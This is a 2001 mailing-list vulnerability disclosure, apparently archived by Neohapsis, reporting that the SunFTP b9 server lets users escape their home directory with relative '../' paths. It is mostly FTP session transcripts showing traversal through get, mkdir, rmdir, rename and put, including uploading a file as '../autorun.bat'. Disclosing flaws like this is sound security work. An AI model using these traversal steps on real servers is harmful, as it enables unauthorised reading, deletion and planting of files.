OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: se00020LION.CC
Date: Fri Mar 02 2001 - 06:14:23 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    It is possible to break out of the root directory by
    using relative paths

    e:\crap was used as homedir. of user test.

    #the get command#

    getting files from outside of the root dir.

    220 chris FTP Server (SunFTP b9) ready on port 21...
    Benutzer (10.17.3.44:(none)): test
    331 Password required for test.
    Kennwort:
    230 User test logged in.
    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
    -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
    226 File sent ok
    FTP: 179 Bytes empfangen in 0,00Sekunden
    179000,00KB/s
    ftp> cd ..
    501 CWD failed. No permission
    ftp> get ../sunftptest.txt
    200 Port command successful.
    150 Opening data connection for ../sunftptest.txt.
    226 File sent ok
    FTP: 1443 Bytes empfangen in 0,00Sekunden
    1443000,00KB/s

    #the mkdir command#

    without priv. to create directories:

    ftp> mkdir test
    550 '/test': can't create directory.
    ftp> mkdir ../test
    257 '/../test': directory created.

    hell!it's getting worse...

    #the rmdir command#

    without any priv. to remove anything

    ftp> rmdir ../test
    250 '/../test': directory removed.

    this only works with empty directories

    #the rename command#

    it is possible to rename files outside of the root
    directory without
    permissions.And it is also possible to move files with
    the rename command,
    when the filename is known.

    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
    -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
    grmbl.txt
    drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
    226 File sent ok
    FTP: 240 Bytes empfangen in 0,00Sekunden
    240000,00KB/s
    ftp> cd ..
    501 CWD failed. No permission
    ftp> rename ../sunftptest.txt movedtohomedir.txt
    350 File exists, ready for destination name.
    250 File '/../sunftptest.txt' renamed
    to '/movedtohomedir.txt'.
    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
    -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
    grmbl.txt
    drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
    -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
    movedtohomedir.txt
    226 File sent ok
    FTP: 314 Bytes empfangen in 0,00Sekunden
    314000,00KB/s

    #the put command#

    If you have permission to upload files, you can put
    these files outside of
    the homedir.

    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
    drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
    -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
    grmbl.txt
    drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
    -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
    movedtohomedir.txt
    226 File sent ok
    FTP: 314 Bytes empfangen in 0,00Sekunden
    314000,00KB/s
    ftp> put
    Lokale Datei c:\test.txt
    Remotedatei test.txt
    200 Port command successful.
    150 Opening data connection for test.txt.
    226 File received ok
    ftp> put
    Lokale Datei c:\test.txt
    Remotedatei ../autorun.bat
    200 Port command successful.
    150 Opening data connection for ../autorun.bat.
    226 File received ok

    Solution

    no quick bugfix. Use with care

    I tried to contact the authors, but their webpage
    seems to be down.

    se00020lion.cc or
    se00020fhs-hagenberg.ac.at